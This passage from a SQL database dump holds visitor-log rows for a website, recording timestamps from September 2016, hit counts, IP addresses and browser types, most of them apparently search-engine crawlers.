6.249.76.46',''),(63290,1474494087,1,1,0,0,'185.76.71.68','chrome'),(63291,1474494401,1,1,0,0,'163.172.64.187','other'),(63292,1474494659,1,1,0,0,'193.104.208.46','chrome'),(63293,1474495201,1,1,0,0,'164.132.161.91','other'),(63294,1474495530,1,1,0,0,'164.132.161.48','other'),(63295,1474495627,1,1,0,0,'66.102.9.25','other'),(63296,1474496034,1,1,0,0,'51.255.65.49','other'),(63297,1474496151,1,1,0,0,'93.180.64.151','other'),(63298,1474497911,1,0,1,0,'66.249.76.46',''),(63299,1474499006,1,1,0,0,'40.77.167.56','other'),(63300,1474499414,1,1,0,0,'66.102.9.29','other'),(63301,1474500109,1,1,0,0,'164.132.161.23','other'),(63302,1474500723,1,1,0,0,'157.55.39.21','other'),(63303,1474501042,1,1,0,0,'164.132.161.11','other'),(63304,1474501874,1,0,1,0,'66.249.66.87',''),(63305,1474503007,1,1,0,0,'66.102.9.25','other'),(63306,1474504275,2,2,0,0,'5.32.182.169','firefox'),(63307,1474504865,1,1,0,0,'164.132.161.51','other'),(63308,1474505032,1,0,1,0,'66.249.66.87',''),(63309,1474505512,1,1,0,0,'163.172.66.72','other'),(63310,1474505872,1,1,0,0,'164.132.161.45','other'),(63311,1474506104,1,1,0,0,'163.172.65.21','other'),(63312,1474506457,1,1,0,0,'66.102.9.25','other'),(63313,1474506540,1,0,1,0,'66.249.76.47',''),(63314,1474506771,1,1,0,0,'163.172.65.12','other'),(63315,1474507032,1,1,0,0,'157.55.39.21','other'),(63316,1474507148,1,1,0,0,'180.76.15.32','other'),(63317,1474507591,1,1,0,0,'51.255.65.97','other'),(63318,1474507756,1,0,1,0,'68.180.229.34',''),(63319,1474508564,1,1,0,0,'164.132.161.23','other'),(63320,1474509193,1,1,0,0,'164.132.161.33','other'),(63321,1474509511,1,1,0,0,'207.46.13.78','other'),(63322,1474509899,1,1,0,0,'163.172.65.108','other'),(63323,1474510122,1,1,0,0,'66.102.9.27','other'),(63324,1474510212,1,1,0,0,'164.132.161.40','other'),(63325,1474511118,1,1,0,0,'163.172.65.63','other'),(63326,1474511870,1,1,0,0,'164.132.161.4','other'),(63327,1474512042,1,1,0,0,'51.255.65.25','other'),(63328,1474512071,1,1,0,0,'164.132.161.27','other'),(63329,1474512619,1,1,0,0,'164.132.161.76','other'),(63330,1474512888,1,1,0,0,'164.132.161.77','other'),(63331,1474513157,1,1,0,0,'40.77.167.56','other'),(63332,1474513690,1,0,1,0,'66.249.76.81',''),(63333,1474513721,1,1,0,0,'163.172.66.15','other'),(63334,1474513760,1,1,0,0,'207.46.13.78','other'),(63335,1474514015,1,0,1,0,'66.249.76.45',''),(63336,1474514222,1,1,0,0,'66.102.9.27','other'),(63337,1474514652,1,1,0,0,'163.172.66.100','other'),(63338,1474515261,1,1,0,0,'164.132.161.93','other'),(63339,1474516912,1,1,0,0,'207.46.13.78','other'),(63340,1474517345,1,1,0,0,'66.102.9.27','other'),(63341,1474518852,1,1,0,0,'163.172.66.35','other'),(63342,1474520791,1,1,0,0,'91.196.178.71','firefox'),(63343,1474520855,1,1,0,0,'66.102.9.27','other'),(63344,1474521779,1,0,1,0,'66.249.76.47',''),(63345,1474522545,1,0,1,0,'68.180.229.34',''),(63346,1474522660,1,1,0,0,'94.179.16.161','firefox'),(63347,1474522911,1,1,0,0,'164.132.161.3','other'),(63348,1474523278,1,1,0,0,'164.132.161.4','other'),(63349,1474523850,1,1,0,0,'66.249.93.14','chrome'),(63350,1474524429,1,1,0,0,'163.172.66.60','other'),(63351,1474524632,1,1,0,0,'207.46.13.78','other'),(63352,1474524817,1,1,0,0,'164.132.161.10','other'),(63353,1474525008,1,1,0,0,'40.77.167.56','other'),(63354,1474525078,1,1,0,0,'164.132.161.16','other'),(63355,1474525172,1,1,0,0,'91.196.178.68','chrome'),(63356,1474525363,1,1,0,0,'91.196.178.71','firefox'),(63357,1474525466,1,1,0,0,'164.132.161.17','other'),(63358,1474525796,1,1,0,0,'163.172.66.153','other'),(63359,1474525819,1,0,1,0,'66.249.76.45',''),(63360,1474525872,1,1,0,0,'164.132.161.28','other'),(63361,1474527231,2,0,2,0,'68.180.229.34',''),(63362,1474527473,1,0,1,0,'66.249.76.45',''),(63363,1474529564,1,0,1,0,'66.249.76.47',''),(63364,1474530011,1,1,0,0,'164.132.161.11','other'),(63365,1474530803,1,0,1,0,'66.249.66.81',''),(63366,1474530976,1,1,0,0,'164.132.161.63','other'),(63367,1474532045,1,1,0,0,'66.249.66.84','chrome'),(63368,1474532171,1,1,0,0,'164.132.161.25','other'),(63369,1474532433,1,1,0,0,'51.255.65.96','other'),(63370,1474532809,1,1,0,0,'157.55.39.21','other'),(63371,1474533108,1,1,0,0,'164.132.161.13','other'),(63372,1474533380,1,1,0,0,'163.172.65.63','other'),(63373,1474533575,1,1,0,0,'91.196.178.71','firefox'),(63374,1474533964,1,1,0,0,'51.255.65.97','other'),(63375,1474533969,1,1,0,0,'164.132.161.31','other'),(63376,1474533994,1,1,0,0,'164.132.161.54','other'),(63377,1474534112,1,1,0,0,'163.172.65.243','other'),(63378,1474534190,1,1,0,0,'5.83.17.159','firefox'),(63379,1474534200,1,0,1,0,'66.249.66.84',''),(63380,1474534292,1,1,0,0,'164.132.161.90','other'),(63381,1474534554,1,1,0,0,'40.77.167.56','other'),(63382,1474534625,1,1,0,0,'91.196.178.71','firefox'),(63383,1474536866,1,1,0,0,'91.196.178.71','firefox'),(63384,1474536896,1,1,0,0,'82.207.116.44','chrome'),(63385,1474537788,2,2,0,0,'91.196.178.71','firefox'),(63386,1474538407,1,1,0,0,'91.196.178.71','chrome'),(63387,1474538706,1,1,0,0,'91.196.178.71','firefox'),(63388,1474538894,2,2,0,0,'66.249.76.45','chrome'),(63389,1474539039,1,1,0,0,'66.102.9.29','other'),(63390,1474539137,2,1,1,0,'66.249.76.81',''),(63391,1474539425,1,1,0,0,'51.255.65.76','other'),(63392,1474540199,1,1,0,0,'164.132.161.37','other'),(63393,1474540227,1,0,1,0,'66.249.66.180',''),(63394,1474540418,1,1,0,0,'91.196.178.66','chrome'),(63395,1474540705,1,1,0,0,'163.172.66.130','other'),(63396,1474541083,1,0,1,0,'66.249.76.45',''),(63397,1474541104,1,0,1,0,'66.249.66.87',''),(63398,1474541581,1,1,0,0,'164.132.161.25','other'),(63399,1474542402,1,1,0,0,'66.102.9.25','other'),(63400,1474542636,1,1,0,0,'180.76.15.10','other'),(63401,1474542701,1,1,0,0,'164.132.161.5','other'),(63402,1474542809,2,2,0,0,'91.124.41.49','opera'),(63403,1474542902,1,1,0,0,'109.108.88.165','chrome'),(63404,1474543317,1,1,0,0,'66.249.76.46','chrome'),(63405,1474543616,1,1,0,0,'91.196.178.71','firefox'),(63406,1474543785,2,2,0,0,'51.255.48.155','other'),(63407,1474543882,1,1,0,0,'164.132.161.65','other'),(63408,1474543908,1,1,0,0,'163.172.65.230','other'),(63409,1474543997,1,1,0,0,'164.132.161.86','other'),(63410,1474544205,1,1,0,0,'91.196.178.71','chrome'),(63411,1474544316,1,1,0,0,'51.255.65.31','other'),(63412,1474544564,1,1,0,0,'91.196.178.71','firefox'),(63413,1474544734,1,0,1,0,'68.180.229.34',''),(63414,1474544913,1,0,1,0,'66.249.76.45',''),(63415,1474545293,1,1,0,0,'164.132.161.56','other'),(63416,1474545300,1,1,0,0,'163.172.65.118','other'),(63417,1474545554,1,1,0,0,'164.132.161.24','other'),(63418,1474545961,1,1,0,0,'51.255.66.125','other'),(63419,1474545962,1,1,0,0,'91.196.178.71','firefox'),(63420,1474546131,1,1,0,0,'66.102.9.29','other'),(63421,1474546540,1,1,0,0,'91.196.178.72','firefox'),(63422,1474546869,2,2,0,0,'91.196.178.71','firefox'),(63423,1474547191,1,1,0,0,'164.132.161.11','other'),(63424,1474547889,1,1,0,0,'91.196.178.71','firefox'),(63425,1474547993,1,1,0,0,'164.132.161.43','other'),(63426,1474548194,1,1,0,0,'164.132.161.97','other'),(63427,1474548269,1,0,1,0,'66.249.66.183',''),(63428,1474549050,2,2,0,0,'164.132.161.39','other'),(63429,1474549188,1,1,0,0,'91.196.178.71','firefox'),(63430,1474549401,1,1,0,0,'5.83.17.159','firefox'),(63431,1474549641,1,1,0,0,'66.102.9.29','other'),(63432,1474550354,1,0,1,0,'68.180.229.34',''),(63433,1474550682,1,1,0,0,'163.172.65.15','other'),(63434,1474550930,1,1,0,0,'91.196.178.71','firefox'),(63435,1474551028,1,0,1,0,'66.249.66.180',''),(63436,1474551559,1,1,0,0,'5.83.17.159','firefox'),(63437,1474551742,1,1,0,0,'95.24.120.24','msie'),(63438,1474552653,2,2,0,0,'91.196.178.68','other'),(63439,1474553035,1,1,0,0,'91.196.178.68','chrome'),(63440,1474553069,3,3,0,0,'91.196.178.71','firefox'),(63441,1474553083,1,1,0,0,'164.132.161.54','other'),(63442,1474553110,1,1,0,0,'66.102.9.29','other'),(63443,1474553191,1,1,0,0,'130.193.50.34','other'),(63444,1474553729,1,1,0,0,'5.9.88.103','other'),(63445,1474554731,1,1,0,0,'188.163.75.56','chrome'),(63446,1474554736,7,0,7,0,'68.180.229.34',''),(63447,1474556710,1,1,0,0,'66.102.9.27','other'),(63448,1474556797,1,1,0,0,'180.76.15.152','other'),(63449,1474557341,1,1,0,0,'51.255.65.71','other'),(63450,1474557711,1,0,1,0,'68.180.229.34',''),(63451,1474558086,1,1,0,0,'163.172.66.60','other'),(63452,1474558183,1,0,1,0,'66.249.76.46',''),(63453,1474558921,1,1,0,0,'95.221.201.87','msie'),(63454,1474559236,1,1,0,0,'91.124.182.3','firefox'),(63455,1474559738,1,0,1,0,'68.180.229.34',''),(63456,1474560239,1,1,0,0,'51.255.65.7','other'),(63457,1474560310,1,1,0,0,'66.102.9.29','other'),(63458,1474560340,1,1,0,0,'188.32.71.228','msie'),(63459,1474561247,1,0,1,0,'66.249.66.87',''),(63460,1474561309,1,0,1,0,'66.249.76.46',''),(63461,1474561349,1,1,0,0,'163.172.65.29','other'),(63462,1474561962,1,1,0,0,'164.132.161.95','other'),(63463,1474562305,1,1,0,0,'163.172.65.206','other'),(63464,1474562524,1,1,0,0,'91.124.182.3','firefox'),(63465,1474562712,1,1,0,0,'163.172.66.28','other'),(63466,1474563499,1,1,0,0,'163.172.66.144','other'),(63467,1474564007,1,1,0,0,'163.172.65.124','other'),(63468,1474564202,1,1,0,0,'164.132.161.30','other'),(63469,1474564297,1,1,0,0,'162.210.196.98','other'),(63470,1474564313,1,1,0,0,'66.102.9.29','other'),(63471,1474564496,1,1,0,0,'164.132.161.23','other'),(63472,1474564676,1,1,0,0,'163.172.66.101','other'),(63473,1474564851,1,1,0,0,'163.172.65.69','other'),(63474,1474565933,1,1,0,0,'82.145.222.253','other'),(63475,1474566014,1,1,0,0,'82.145.220.133','other'),(63476,1474566296,1,1,0,0,'163.172.65.4','other'),(63477,1474566450,1,1,0,0,'51.255.65.70','other'),(63478,1474566596,1,1,0,0,'207.46.13.94','other'),(63479,1474567435,1,1,0,0,'40.77.167.56','other'),(63480,1474567631,1,1,0,0,'66.102.9.29','other'),(63481,1474567635,1,1,0,0,'180.76.15.18','other'),(63482,1474567846,1,1,0,0,'164.132.161.80','other'),(63483,1474567898,1,1,0,0,'207.46.13.94','other'),(63484,1474567923,1,1,0,0,'51.255.65.40','other'),(63485,1474567943,1,1,0,0,'164.132.161.37','other'),(63486,1474568763,1,1,0,0,'164.132.161.39','other'),(63487,1474569267,1,1,0,0,'91.196.178.66','firefox'),(63488,1474570042,1,1,0,0,'163.172.64.253','other'),(63489,1474570265,1,1,0,0,'95.221.233.59','chrome'),(63490,1474570463,1,1,0,0,'51.255.65.86','other'),(63491,1474570646,1,1,0,0,'163.172.66.6','other'),(63492,1474570694,1,1,0,0,'157.55.39.215','other'),(63493,1474571317,1,1,0,0,'164.132.161.2','other'),(63494,1474571359,1,1,0,0,'163.172.65.62','other'),(63495,1474571517,1,1,0,0,'66.102.9.25','other'),(63496,1474572416,1,1,0,0,'163.172.66.83','other'),(63497,1474572685,1,1,0,0,'51.255.65.22','other'),(63498,1474574141,1,1,0,0,'164.132.161.2','other'),(63499,1474574343,1,1,0,0,'51.255.65.60','other'),(63500,1474574490,2,2,0,0,'80.70.75.194','firefox'),(63501,1474574547,1,1,0,0,'37.229.54.166','chrome'),(63502,1474574712,1,1,0,0,'66.102.9.29','other'),(63503,1474575300,1,1,0,0,'164.132.161.7','other'),(63504,1474575391,1,0,1,0,'66.249.76.77',''),(63505,1474575462,1,0,1,0,'66.249.66.180',''),(63506,1474575965,1,1,0,0,'51.255.65.51','other'),(63507,1474576016,1,1,0,0,'51.255.65.96','other'),(63508,1474576505,1,1,0,0,'164.132.161.65','other'),(63509,1474576845,1,1,0,0,'164.132.161.61','other'),(63510,1474576918,1,1,0,0,'40.77.167.56','other'),(63511,1474576978,1,1,0,0,'51.255.65.24','other'),(63512,1474577119,1,1,0,0,'163.172.66.79','other'),(63513,1474577688,1,1,0,0,'164.132.161.79','other'),(63514,1474577967,1,1,0,0,'157.55.39.215','other'),(63515,1474578106,1,1,0,0,'51.255.65.13','other'),(63516,1474578310,1,1,0,0,'66.102.9.27','other'),(63517,1474579127,1,1,0,0,'163.172.65.243','other'),(63518,1474579341,1,1,0,0,'164.132.161.7','other'),(63519,1474579496,1,1,0,0,'163.172.65.116','other'),(63520,1474579593,1,0,1,0,'66.249.76.47',''),(63521,1474579996,1,1,0,0,'163.172.64.192','other'),(63522,1474580130,4,4,0,0,'162.210.196.97','other'),(63523,1474580890,1,1,0,0,'51.255.65.62','other'),(63524,1474581009,1,1,0,0,'51.255.65.2','other'),(63525,1474581091,1,1,0,0,'163.172.65.234','other'),(63526,1474581671,1,1,0,0,'51.255.65.36','other'),(63527,1474581912,1,1,0,0,'66.102.9.25','other'),(63528,1474581922,1,1,0,0,'163.172.66.87','other'),(63529,1474582129,1,1,0,0,'163.172.66.183','other'),(63530,1474582231,1,0,1,0,'66.249.76.46',''),(63531,1474582353,1,1,0,0,'163.172.66.41','other'),(63532,1474582397,1,1,0,0,'157.55.39.215','other'),(63533,1474584300,1,1,0,0,'163.172.65.192','other'),(63534,1474585460,1,1,0,0,'163.172.66.157','other'),(63535,1474585518,1,1,0,0,'66.102.9.25','other'),(63536,1474586124,1,1,0,0,'51.255.65.67','other'),(63537,1474586429,1,1,0,0,'163.172.66.134','other'),(63538,1474586516,1,1,0,0,'40.77.167.56','other'),(63539,1474586772,1,1,0,0,'51.255.65.3','other'),(63540,1474587231,1,1,0,0,'164.132.161.69','other'),(63541,1474588033,1,1,0,0,'51.255.65.34','other'),(63542,1474588757,1,1,0,0,'51.255.65.89','other'),(63543,1474588833,1,1,0,0,'51.255.65.58','other'),(63544,1474589123,1,1,0,0,'66.102.9.27','other'),(63545,1474589204,1,1,0,0,'51.255.65.83','other'),(63546,1474589337,1,1,0,0,'207.46.13.166','other'),(63547,1474589787,1,1,0,0,'51.255.65.13','other'),(63548,1474590333,1,1,0,0,'157.55.39.215','other'),(63549,1474590438,1,1,0,0,'164.132.161.26','other'),(63550,1474591913,1,1,0,0,'180.76.15.146','other'),(63551,1474592391,1,1,0,0,'163.172.65.119','other'),(63552,1474592725,1,1,0,0,'66.102.9.29','other'),(63553,1474592891,1,1,0,0,'164.132.161.72','other'),(63554,1474593203,1,1,0,0,'51.255.65.5','other'),(63555,1474593406,1,1,0,0,'164.132.161.49','other'),(63556,1474593469,1,1,0,0,'180.76.15.22','other'),(63557,1474593799,1,1,0,0,'163.172.65.231','other'),(63558,1474594023,1,1,0,0,'164.132.161.88','other'),(63559,1474594087,1,1,0,0,'51.255.65.15','other'),(63560,1474594326,1,1,0,0,'91.196.178.166','chrome'),(63561,1474594432,1,1,0,0,'164.132.161.85','other'),(63562,1474596012,1,1,0,0,'51.255.65.17','other'),(63563,1474596391,1,1,0,0,'66.102.9.25','other'),(63564,1474596454,1,1,0,0,'163.172.65.235','other'),(63565,1474597226,1,1,0,0,'163.172.65.132','other'),(63566,1474597344,1,1,0,0,'163.172.66.134','other'),(63567,1474597589,1,1,0,0,'51.255.65.57','other'),(63568,1474599025,1,1,0,0,'163.172.66.55','other'),(63569,1474599200,1,1,0,0,'51.255.65.92','other'),(63570,1474599578,1,1,0,0,'164.132.161.59','other'),(63571,1474599983,1,1,0,0,'164.132.161.27','other'),(63572,1474600253,1,1,0,0,'66.102.9.29','other'),(63573,1474600261,1,1,0,0,'163.172.65.67','other'),(63574,1474601226,1,1,0,0,'164.132.161.16','other'),(63575,1474601554,1,1,0,0,'164.132.161.40','other'),(63576,1474601715,1,1,0,0,'164.132.161.35','other'),(63577,1474601717,1,1,0,0,'185.26.180.105','other'),(63578,1474603608,1,1,0,0,'66.102.9.27','other'),(63579,1474603674,1,0,1,0,'66.249.76.45',''),(63580,1474603702,1,1,0,0,'163.172.64.240','other'),(63581,1474603971,1,1,0,0,'163.172.66.100','other'),(63582,1474604285,1,1,0,0,'164.132.161.40','other'),(63583,1474604365,1,1,0,0,'163.172.65.17','other'),(63584,1474604981,1,0,1,0,'66.249.76.45',''),(63585,1474606100,1,1,0,0,'51.255.65.76','other'),(63586,1474606232,1,0,1,0,'66.249.76.46',''),(63587,1474606237,1,1,0,0,'217.69.133.238','other'),(63588,1474606720,1,1,0,0,'207.46.13.166','other'),(63589,1474606799,1,1,0,0,'163.172.64.220','other'),(63590,1474607158,1,1,0,0,'91.196.178.71','firefox'),(63591,1474607204,1,1,0,0,'37.53.239.1','firefox'),(63592,1474607252,1,1,0,0,'66.102.9.27','other'),(63593,1474607293,1,1,0,0,'163.172.66.108','other'),(63594,1474607546,1,1,0,0,'163.172.65.243','other'),(63595,1474607666,1,1,0,0,'164.132.161.85','other'),(63596,1474607673,5,5,0,0,'69.197.163.195','other'),(63597,1474607943,1,1,0,0,'51.255.65.54','other'),(63598,1474608228,1,1,0,0,'91.196.178.71','chrome'),(63599,1474608336,1,1,0,0,'163.172.66.95','other'),(63600,1474608458,1,1,0,0,'51.255.65.59','other'),(63601,1474609238,1,1,0,0,'94.179.65.246','firefox'),(63602,1474609631,1,1,0,0,'163.172.65.123','other'),(63603,1474609816,1,1,0,0,'163.172.64.182','other'),(63604,1474610055,1,1,0,0,'66.249.76.46','chrome'),(63605,1474610340,1,1,0,0,'207.46.13.94','other'),(63606,1474610587,1,1,0,0,'163.172.66.28','other'),(63607,1474610762,2,2,0,0,'178.203.120.68','other'),(63608,1474611146,1,1,0,0,'66.102.9.25','other'),(63609,1474611466,1,1,0,0,'66.249.93.13','chrome'),(63610,1474611546,1,1,0,0,'51.255.65.23','other'),(63611,1474612360,1,0,1,0,'68.180.229.34',''),(63612,1474612454,1,1,0,0,'164.132.161.49','other'),(63613,1474612716,1,1,0,0,'91.196.178.72','chrome'),(63614,1474613640,1,0,1,0,'68.180.229.34',''),(63615,1474614418,1,1,0,0,'66.102.9.29','other'),(63616,1474614837,1,1,0,0,'51.255.65.18','other'),(63617,1474615025,1,1,0,0,'164.132.161.80','other'),(63618,1474615207,1,1,0,0,'157.55.39.215','other'),(63619,1474615989,1,1,0,0,'91.196.178.71','firefox'),(63620,1474616290,1,1,0,0,'164.132.161.5','other'),(63621,1474616352,1,0,1,0,'66.249.76.47',''),(63622,1474616465,1,1,0,0,'82.207.91.234','firefox'),(63623,1474616636,1,1,0,0,'51.255.65.14','other'),(63624,1474616955,1,1,0,0,'164.132.161.62','other'),(63625,1474617067,1,1,0,0,'163.172.64.252','other'),(63626,1474617780,2,2,0,0,'51.255.65.7','other'),(63627,1474617861,1,1,0,0,'163.172.66.133','other'),(63628,1474617957,1,1,0,0,'66.102.9.25','other'),(63629,1474618168,1,1,0,0,'163.172.66.88','other'),(63630,1474619373,1,1,0,0,'163.172.65.249','other'),(63631,1474620535,1,1,0,0,'163.172.65.22','other'),(63632,1474620673,1,1,0,0,'40.77.167.56','other'),(63633,1474620962,1,0,1,0,'66.249.76.79',''),(63634,1474621019,1,0,1,0,'66.249.66.87',''),(63635,1474621234,1,1,0,0,'163.172.66.19','other'),(63636,1474621440,4,4,0,0,'51.254.121.186','other'),(63637,1474621624,1,1,0,0,'66.102.9.25','other'),(63638,1474621694,1,1,0,0,'164.132.161.6','other'),(63639,1474621746,1,1,0,0,'163.172.65.186','other'),(63640,1474621805,1,1,0,0,'163.172.65.35','other'),(63641,1474621909,1,1,0,0,'91.196.178.67','chrome'),(63642,1474622267,1,1,0,0,'51.255.65.69','other'),(63643,1474622333,1,1,0,0,'91.196.178.136','firefox'),(63644,1474622937,1,1,0,0,'164.132.161.37','other'),(63645,1474622967,1,1,0,0,'51.255.65.81','other'),(63646,1474623399,1,1,0,0,'163.172.66.10','other'),(63647,1474623901,1,1,0,0,'163.172.64.185','other'),(63648,1474624283,1,1,0,0,'207.46.13.166','other'),(63649,1474624297,1,1,0,0,'51.255.65.30','other'),(63650,1474624352,1,1,0,0,'91.196.178.70','firefox'),(63651,1474624398,1,1,0,0,'91.196.178.71','firefox'),(63652,1474624720,1,1,0,0,'180.76.15.33','other'),(63653,1474624930,1,1,0,0,'78.26.184.165','chrome'),(63654,1474625414,1,1,0,0,'163.172.65.117','other'),(63655,1474625490,1,1,0,0,'66.102.9.29','other'),(63656,1474625497,1,0,1,0,'66.249.76.46',''),(63657,1474626520,1,1,0,0,'51.255.65.44','other'),(63658,1474627108,1,1,0,0,'40.77.167.56','other'),(63659,1474627895,1,1,0,0,'51.255.65.49','other'),(63660,1474628213,1,0,1,0,'66.249.66.84',''),(63661,1474628313,1,1,0,0,'163.172.65.50','other'),(63662,1474628531,1,0,1,0,'68.180.229.34',''),(63663,1474629159,1,1,0,0,'207.46.13.166','other'),(63664,1474629161,1,1,0,0,'66.102.9.25','other'),(63665,1474629388,1,1,0,0,'51.255.65.18','other'),(63666,1474629432,1,1,0,0,'5.83.17.159','firefox'),(63667,1474629585,1,1,0,0,'164.132.161.31','other'),(63668,1474629760,1,1,0,0,'91.196.178.70','firefox'),(63669,1474630708,1,1,0,0,'51.255.65.28','other'),(63670,1474630772,1,1,0,0,'163.172.64.248','other'),(63671,1474631059,1,1,0,0,'164.132.161.95','other'),(63672,1474631740,1,1,0,0,'164.132.161.7','other'),(63673,1474632127,1,1,0,0,'164.132.161.70','other'),(63674,1474632453,1,1,0,0,'66.102.9.27','other'),(63676,1474633002,1,1,0,0,'207.46.13.94','other'),(63677,1474633655,1,1,0,0,'51.255.65.83','other'),(63678,1474634278,1,1,0,0,'163.172.65.196','other'),(63679,1474634426,1,1,0,0,'163.172.65.43','other'),(63680,1474634563,1,1,0,0,'80.91.183.193','chrome'),(63681,1474634840,1,1,0,0,'163.172.65.51','other'),(63682,1474635012,1,1,0,0,'91.196.178.71','firefox'),(63683,1474635665,1,1,0,0,'164.132.161.65','other'),(63684,1474636046,1,1,0,0,'163.172.66.147','other'),(63685,1474636127,1,1,0,0,'66.102.9.27','other'),(63686,1474636140,1,1,0,0,'163.172.66.33','other'),(63687,1474636147,1,1,0,0,'164.132.161.96','other'),(63688,1474636672,1,1,0,0,'163.172.65.60','other'),(63689,1474636694,1,1,0,0,'163.172.64.234','other'),(63690,1474636711,1,1,0,0,'66.249.76.47','chrome'),(63691,1474636839,1,1,0,0,'40.77.167.56','other'),(63692,1474636841,1,1,0,0,'51.255.65.22','other'),(63693,1474637282,1,1,0,0,'164.132.161.41','other'),(63694,1474637336,1,1,0,0,'66.249.76.79','chrome'),(63695,1474637472,1,1,0,0,'163.172.65.235','other'),(63696,1474637639,1,1,0,0,'51.255.65.56','other'),(63697,1474637965,1,1,0,0,'163.172.66.59','other'),(63698,1474638406,1,0,1,0,'66.249.76.47',''),(63699,1474638551,1,1,0,0,'51.255.65.56','other'),(63700,1474638836,1,1,0,0,'163.172.66.158','other'),(63701,1474638869,1,0,1,0,'68.180.229.34',''),(63702,1474639068,1,1,0,0,'178.92.249.197','chrome'),(63703,1474639172,1,1,0,0,'51.255.65.42','other'),(63704,1474639282,1,1,0,0,'164.132.161.13','other'),(63705,1474639581,1,1,0,0,'66.102.9.27','other'),(63706,1474639992,1,1,0,0,'164.132.161.14','other'),(63707,1474640213,1,1,0,0,'130.193.50.34','other'),(63708,1474640722,1,0,1,0,'66.249.76.47',''),(63709,1474640744,1,0,1,0,'66.249.76.45',''),(63710,1474640759,1,0,1,0,'66.249.66.183',''),(63711,1474640761,1,0,1,0,'66.249.76.46',''),(63712,1474641137,1,1,0,0,'130.193.50.34','other'),(63713,1474641194,1,1,0,0,'163.172.65.204','other'),(63714,1474641229,1,1,0,0,'5.255.250.41','other'),(63715,1474641810,1,1,0,0,'217.69.133.169','firefox'),(63716,1474641816,1,1,0,0,'164.132.161.30','other'),(63717,1474642440,1,1,0,0,'51.255.65.28','other'),(63718,1474642713,1,1,0,0,'91.196.178.66','firefox'),(63719,1474643268,1,1,0,0,'66.102.9.27','other'),(63720,1474644082,1,1,0,0,'130.193.50.34','other'),(63721,1474644306,1,1,0,0,'91.124.182.3','firefox'),(63722,1474644589,1,1,0,0,'207.46.13.166','other'),(63723,1474644705,1,0,1,0,'66.249.66.84',''),(63724,1474644901,1,1,0,0,'163.172.65.110','other'),(63725,1474644915,1,1,0,0,'91.196.178.167','chrome'),(63726,1474645493,1,1,0,0,'163.172.66.64','other'),(63727,1474645680,1,1,0,0,'164.132.161.59','other'),(63728,1474646652,1,1,0,0,'94.179.83.88','chrome'),(63729,1474646680,1,0,1,0,'66.249.76.47',''),(63730,1474646787,1,1,0,0,'66.102.9.27','other'),(63731,1474646946,1,1,0,0,'51.255.65.73','other'),(63732,1474647468,1,0,1,0,'68.180.229.34',''),(63733,1474647530,1,1,0,0,'164.132.161.24','other'),(63734,1474648546,1,1,0,0,'163.172.65.54','other'),(63735,1474648784,1,0,1,0,'68.180.229.34',''),(63736,1474648965,1,1,0,0,'92.113.157.142','chrome'),(63737,1474648980,1,1,0,0,'164.132.161.58','other'),(63738,1474649277,1,1,0,0,'51.255.65.68','other'),(63739,1474649353,1,1,0,0,'207.46.13.166','other'),(63740,1474650155,1,1,0,0,'164.132.161.72','other'),(63741,1474650218,1,1,0,0,'157.55.39.215','other'),(63742,1474650317,1,1,0,0,'163.172.66.74','other'),(63743,1474650391,1,1,0,0,'66.102.9.29','other'),(63744,1474650487,1,1,0,0,'91.196.178.65','chrome'),(63745,1474650700,1,1,0,0,'51.255.65.12','other'),(63746,1474650736,1,1,0,0,'163.172.66.122','other'),(63747,1474651068,1,1,0,0,'164.132.161.91','other'),(63748,1474651159,1,1,0,0,'51.255.65.41','other'),(63749,1474651947,1,0,1,0,'66.249.76.47',''),(63750,1474651959,3,3,0,0,'130.193.51.19','other'),(63751,1474652215,4,4,0,0,'141.8.183.25','other'),(63752,1474652261,1,1,0,0,'141.8.142.58','other'),(63753,1474652387,1,1,0,0,'157.55.39.215','other'),(63754,1474652434,2,2,0,0,'130.193.50.34','other'),(63755,1474652468,1,1,0,0,'163.172.64.228','other'),(63756,1474652823,1,1,0,0,'141.8.142.61','other'),(63757,1474652944,1,1,0,0,'141.8.142.78','other'),(63758,1474653044,1,1,0,0,'51.255.65.64','other'),(63759,1474653111,1,1,0,0,'141.8.142.25','other'),(63760,1474653115,1,1,0,0,'141.8.184.22','other'),(63761,1474653193,1,1,0,0,'130.193.50.6','other'),(63762,1474653338,1,1,0,0,'130.193.50.34','other'),(63763,1474653342,1,1,0,0,'51.255.65.20','other'),(63764,1474653498,1,1,0,0,'141.8.183.25','other'),(63765,1474653564,1,1,0,0,'51.255.65.34','other'),(63766,1474653793,1,1,0,0,'164.132.161.14','other'),(63767,1474654179,1,1,0,0,'66.102.9.29','other'),(63768,1474654521,1,0,1,0,'66.249.66.84',''),(63769,1474654582,1,1,0,0,'46.211.112.92','other'),(63770,1474654695,1,1,0,0,'40.77.167.56','other'),(63771,1474655017,1,1,0,0,'164.132.161.48','other'),(63772,1474655258,1,1,0,0,'163.172.66.40','other'),(63773,1474655585,1,1,0,0,'91.196.178.133','chrome'),(63774,1474656004,1,1,0,0,'163.172.66.5','other'),(63775,1474656183,1,1,0,0,'66.102.9.25','chrome'),(63776,1474656243,1,1,0,0,'164.132.161.50','other'),(63777,1474656312,1,1,0,0,'207.46.13.94','other'),(63778,1474657065,1,1,0,0,'164.132.161.47','other'),(63779,1474657397,1,1,0,0,'51.255.65.46','other'),(63780,1474657870,1,1,0,0,'82.145.220.108','other'),(63781,1474657991,1,1,0,0,'66.102.9.27','other'),(63782,1474659286,1,0,1,0,'66.249.76.45',''),(63783,1474659822,1,1,0,0,'46.188.31.221','msie'),(63784,1474659953,1,1,0,0,'207.46.13.94','other'),(63785,1474660101,1,1,0,0,'163.172.66.168','other'),(63786,1474660266,1,1,0,0,'163.172.66.179','other'),(63787,1474660991,1,1,0,0,'163.172.66.61','other'),(63788,1474661082,1,1,0,0,'164.132.161.70','other'),(63789,1474661328,1,1,0,0,'66.102.9.25','other'),(63790,1474661423,1,1,0,0,'163.172.64.184','other'),(63791,1474661574,1,1,0,0,'164.132.161.69','other'),(63792,1474661589,1,1,0,0,'51.255.65.26','other'),(63793,1474661710,1,1,0,0,'180.76.15.151','other'),(63794,1474661725,1,1,0,0,'163.172.65.17','other'),(63795,1474661749,1,1,0,0,'207.46.13.82','other'),(63796,1474662323,2,1,1,0,'195.154.233.180',''),(63797,1474662676,1,1,0,0,'163.172.65.52','other'),(63798,1474662920,1,1,0,0,'207.46.13.166','other'),(63799,1474663239,1,1,0,0,'163.172.65.251','other'),(63800,1474663899,1,1,0,0,'163.172.64.232','other'),(63801,1474664376,1,1,0,0,'163.172.65.201','other'),(63802,1474664424,1,1,0,0,'51.255.65.42','other'),(63803,1474664609,1,1,0,0,'163.172.65.199','other'),(63804,1474664669,1,1,0,0,'164.132.161